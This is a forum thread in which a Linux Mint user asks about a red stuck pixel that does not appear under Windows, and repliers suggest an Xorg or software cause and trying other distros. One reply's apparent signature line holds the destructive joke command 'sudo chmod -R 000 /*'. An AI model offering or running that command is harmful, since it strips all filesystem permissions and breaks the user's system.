2020 - Stuck pixel in Ubuntu19

After researching for hours, the only forums that talk about this are the ones from 2012-2013, and they recommend the tool "LCDnurse". Problem is, that's a program from 2012 and the webpage is unreachable.

I have Linux mint (the equivalent in every aspect to Ubuntu) and I also have Windows 10. On Windows 10 there's no stuck pixels and no problem. It's only in Linux, that is how I know the pixel is not dead. Also, it is stuck in color red so that might be a clue too.

I have an Nvidia cpu (the GTX 1060 to be precise) and I have the official driver installed. I tried switching from the 1060 to the on-board graphics but the pixel is still there. Any clue about what is happening?

Thank you in advance.

2 hours ago, margual56 said:

On Windows 10 there's no stuck pixels

This means it's a software problem and you shouldn't be looking for solutions to "stuck pixels" because those usually refer to hardware problems in the monitor.

2 hours ago, margual56 said:

It's only in Linux

Have you tried any other distros or even just reinstalling Mint? From your description it seems like an Xorg bug, try playing with different resolution settings to see if the pixel remains stuck.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

On 1/31/2020 at 4:48 AM, margual56 said:

After researching for hours, the only forums that talk about this are the ones from 2012-2013, and they recommend the tool "LCDnurse". Problem is, that's a program from 2012 and the webpage is unreachable.

I have Linux mint (the equivalent in every aspect to Ubuntu) and I also have Windows 10. On Windows 10 there's no stuck pixels and no problem. It's only in Linux, that is how I know the pixel is not dead. Also, it is stuck in color red so that might be a clue too.

I have an Nvidia cpu (the GTX 1060 to be precise) and I have the official driver installed. I tried switching from the 1060 to the on-board graphics but the pixel is still there. Any clue about what is happening?

Thank you in advance.

As mentioned above most likely software issue. Try checking time see if any updates are available. Some times that can help. Also as suggested above I’d try another distro. At least a Live USB. I’ve heard that Mint can be a bit more buggy than Ubuntu. 

I just want to sit back and watch the world burn.